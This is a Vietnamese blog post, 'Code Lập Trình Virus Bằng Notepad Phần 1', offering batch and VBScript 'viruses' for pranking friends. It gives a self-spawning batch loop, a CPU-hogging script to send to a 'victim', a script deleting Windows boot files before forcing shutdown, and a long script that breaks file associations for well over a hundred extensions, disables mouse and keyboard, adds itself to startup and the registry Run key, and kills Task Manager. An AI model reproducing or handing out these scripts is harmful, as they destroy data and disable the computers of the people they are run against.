Code Lập Trình Virus Bằng Notepad Phần 1


Sau Đây là 1 số virus bạn cần biết và thử nghiệm để tăng tay nghề khi học lập trình, và để TROLL bạn bè!! Sau Đây là 1 số virus bạn cần biết và thử nghiệm để tăng tay nghề khi 
học lập trình:

1.đây là virus kiểng nhưng khó tắt
Code đơn giản

Start 1.bat

Lưu với tên 1.bat

2.virus thông báo
Đây là loại virus dùng để tạo thông báo giả nhằm troll bạn bè đang dùng máy tính.
Hoặc dùng để...Tán gái :V Nó hoàn toàn vô hại
Các bạn có thể tùy chỉnh dòng thông báo trong đấy cho phù hợp với mục đích của mình


msgbox " Nhập thông báo ở đây!",,"Tên thông báo !"
msgbox " Nhập thông báo ở đây",," Tên thông báo!"
do

msgbox " Nhập thông báo ở đây ",," Tên thông báo "
loop
Lưu vs’ tên đuôi là .VBS
3.phá windown hoặc delete 1 tệp khác

-B1: tạo 1 file bất kỳ(1.txt, 1.bat, 1.exe...v..v..)
Vd: C:\Users\chuong\Desktop\1.txt
-B2: vào notepad
-B3 :Đánh lệnh erase C:\Users\chuong\Desktop\1.txt
-B4: lưu dưới dạng *.cmd
-B5: Chạy file *.cmd

thế là file 1.txt đã bị xóa ( thay cái lệnh trông bước 2 thành C:\ Windows  là 

cái windows của bạn nó…)

4.virus khó đỡ

 B1: vào notepad gõ cú pháp:
while true
wend

-B2: Sau đó lưu lại dưới đuôi* .vbs
-B3: gửi victim (nạn nhân) dụ cho victim chạy tập tin này( đừng có gắng thử nhé....

không chịu trách nhiệm đâu đấy)

Đây mới chỉ là virut, nếu viết autorun cho nó nữa thì cực kỳ nguy hiểm, con này mỗi lần chạy thì

 nó chiếm 100% cpu của 1 luồng dữ liệu. Với máy core 2duo thì click 2 phát CPU 100%,
 core i3, i5 thì click 4 lần. Sau khi bị chiếm 100% cpu muốn tắt đi thì vào Task Manager
 tắt hết những chương trình có đuôi vbscript đang chạy. Đó là virut chạy do con
 người điều khiển, còn nếu viết thêm autorun để nó chạy tự động, giả sử số lần click là lớn
 hơn 10 thì thôi rồi, chỉ có cài lại win.

Và Sau Đây Là Các Con Virus Bạn 
Cần Phải Lưu Dưới dạng .bat (vd: 2.bat)

4.virus phá hoại cửa sổ windown 2

Vào Notepad nhập dòng sau:
Code:
@echo off
msg *virus activated*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *Computer Over. Virus=Very Yes.*
shutdown -s -t 10 -c " "

5.loại virus này làm vô hiệu hóa chuột, 
bàn phím,task manager, thay đổi tập tin:

code:

@echo off
prompt $P $G
assoc .doc = fA1luRe
assoc .docx = fA1luRe
assoc .log = fA1luRe
assoc .msg = fA1luRe
assoc .pages = fA1luRe
assoc .rtf = fA1luRe
assoc .txt = fA1luRe
assoc .wpd = fA1luRe
assoc .wps = fA1luRe
assoc .accdb = fA1luRe
assoc .blg = fA1luRe
assoc .csv = fA1luRe
assoc .dat = fA1luRe
assoc .db = fA1luRe
assoc .efx = fA1luRe
assoc .mdb = fA1luRe
assoc .pdb = fA1luRe
assoc .pps = fA1luRe
assoc .ppt = fA1luRe
assoc .pptx = fA1luRe
assoc .sdb = fA1luRe
assoc .sdf = fA1luRe
assoc .sql = fA1luRe
assoc .vcf = fA1luRe
assoc .wks = fA1luRe
assoc .xls = fA1luRe
assoc .xlsx = fA1luRe
assoc .xml = fA1luRe
assoc .bmp = fA1luRe
assoc .gif = fA1luRe
assoc .jpg = fA1luRe
assoc .png = fA1luRe
assoc .psd = fA1luRe
assoc .psp = fA1luRe
assoc .thm = fA1luRe
assoc .tif = fA1luRe
assoc .ai = fA1luRe
assoc .drw = fA1luRe
assoc .eps = fA1luRe
assoc .ps = fA1luRe
assoc .svg = fA1luRe
assoc .3dm = fA1luRe
assoc .dwg = fA1luRe
assoc .dxf = fA1luRe
assoc .pln = fA1luRe
assoc .indd = fA1luRe
assoc .pct = fA1luRe
assoc .pdf = fA1luRe
assoc .qxd = fA1luRe
assoc .qxp = fA1luRe
assoc .rels = fA1luRe
assoc .aac = fA1luRe
assoc .aif = fA1luRe
assoc .iff = fA1luRe
assoc .m3u = fA1luRe
assoc .mid = fA1luRe
assoc .mp3 = fA1luRe
assoc .mpa = fA1luRe
assoc .ra = fA1luRe
assoc .wav = fA1luRe
assoc .wma = fA1luRe
assoc .3g2 = fA1luRe
assoc .3gp = fA1luRe
assoc .asf = fA1luRe
assoc .asx = fA1luRe
assoc .avi = fA1luRe
assoc .flv = fA1luRe
assoc .mov = fA1luRe
assoc .mp4 = fA1luRe
assoc .mpg = fA1luRe
assoc .rm = fA1luRe
assoc .swf = fA1luRe
assoc .vob = fA1luRe
assoc .wmv = fA1luRe
assoc .asp = fA1luRe
assoc .cer = fA1luRe
assoc .csr = fA1luRe
assoc .css = fA1luRe
assoc .htm = fA1luRe
assoc .html = fA1luRe
assoc .js = fA1luRe
assoc .jsp = fA1luRe
assoc .php = fA1luRe
assoc .rss = fA1luRe
assoc .tvpi = fA1luRe
assoc .tvvi = fA1luRe
assoc .xhtml = fA1luRe
assoc .fnt = fA1luRe
assoc .fon = fA1luRe
assoc .otf = fA1luRe
assoc .ttf = fA1luRe
assoc .8bi = fA1luRe
assoc .plugin = fA1luRe
assoc .xll = fA1luRe
assoc .cab = fA1luRe
assoc .cpl = fA1luRe
assoc .cur = fA1luRe
assoc .dll = fA1luRe
assoc .dmp = fA1luRe
assoc .drv = fA1luRe
assoc .key = fA1luRe
assoc .lnk = fA1luRe
assoc .sys = fA1luRe
assoc .cfg = fA1luRe
assoc .ini = fA1luRe
assoc .keychain = fA1luRe
assoc .prf = fA1luRe
assoc .app = fA1luRe
assoc .bat = fA1luRe
assoc .cgi = fA1luRe
assoc .com = fA1luRe
assoc .exe = fA1luRe
assoc .pif = fA1luRe
assoc .vb = fA1luRe
assoc .ws = fA1luRe
assoc .7z = fA1luRe
assoc .deb = fA1luRe
assoc .gz = fA1luRe
assoc .pkg = fA1luRe
assoc .rar = fA1luRe
assoc .sit = fA1luRe
assoc .sitx = fA1luRe
assoc .tar.gz = fA1luRe
assoc .zip = fA1luRe
assoc .zipx = fA1luRe
assoc .bin = fA1luRe
assoc .hqx = fA1luRe
assoc .mim = fA1luRe
assoc .uue = fA1luRe
assoc .c = fA1luRe
assoc .cpp = fA1luRe
assoc .dtd = fA1luRe
assoc .java = fA1luRe
assoc .pl = fA1luRe
assoc .bak = fA1luRe
assoc .bup = fA1luRe
assoc .gho = fA1luRe
assoc .ori = fA1luRe
assoc .tmp = fA1luRe
assoc .dmg = fA1luRe
assoc .iso = fA1luRe
assoc .toast = fA1luRe
assoc .vcd = fA1luRe
assoc .gam = fA1luRe
assoc .nes = fA1luRe
assoc .rom = fA1luRe
assoc .sav = fA1luRe
assoc .dbx = fA1luRe
assoc .msi = fA1luRe
assoc .part = fA1luRe
assoc .torrent = fA1luRe
assoc .yps = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"


Chúc các bạn thành công

Post a Comment

1 Comments

Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)